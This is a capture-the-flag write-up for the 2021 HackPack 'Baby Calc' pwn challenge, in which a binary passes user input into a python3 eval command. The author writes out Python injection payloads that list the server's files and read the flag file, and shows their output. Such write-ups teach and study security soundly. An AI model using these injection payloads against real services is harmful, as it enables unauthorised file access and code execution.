Baby Calc
Category: pwn
50 points
We put addition in the cloud!
nc ctf2021.hackpack.club 11001
Hint: Try debugging.
File: chal
Solution
chall
file looks like a ordinary binary ;-)
file chall
chall: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.s
o.2, BuildID[sha1]=e5bdadade029e7e030196070fb434cf2d92bbbad, for GNU/Linux 3.2.0, with debug_info, not stripped
But after few executions I’ve realized it’s apparently calling python to perform calculations.
./chall
Welcome to CloudAdd! The fastest* adder on the planet, now in cloud!
*this is not a legally binding statement
Variable one: 1
Variable two: 2
3
./chall
Welcome to CloudAdd! The fastest* adder on the planet, now in cloud!
*this is not a legally binding statement
Variable one: dsadas
Variable two: 4343
Traceback (most recent call last):
File "<string>", line 1, in <module>
NameError: name 'dsadas' is not defined
Even without debugging or decompiling it became obvious.
strings chall | grep python
python3 -c 'print(%s + %s)'
Let’s exploit it :-) Firstly I’ve passed empty string as the first argument and "".join(__import__("os").listdir())
as the second one. Just to check where’s the flag.
nc ctf2021.hackpack.club 11001
Welcome to CloudAdd! The fastest* adder on the planet, now in cloud!
*this is not a legally binding statement
Variable one: ""
Variable two: "".join(__import__("os").listdir())
flagchal
Ok, let’s read the flag content by passing open("flag","rt").read()
payload as a second argument.
nc ctf2021.hackpack.club 11001
Welcome to CloudAdd! The fastest* adder on the planet, now in cloud!
*this is not a legally binding statement
Variable one: ""
Variable two: open("flag","rt").read()
flag{cL0uD_5Tr4tEgy}
Flag
flag{cL0uD_5Tr4tEgy}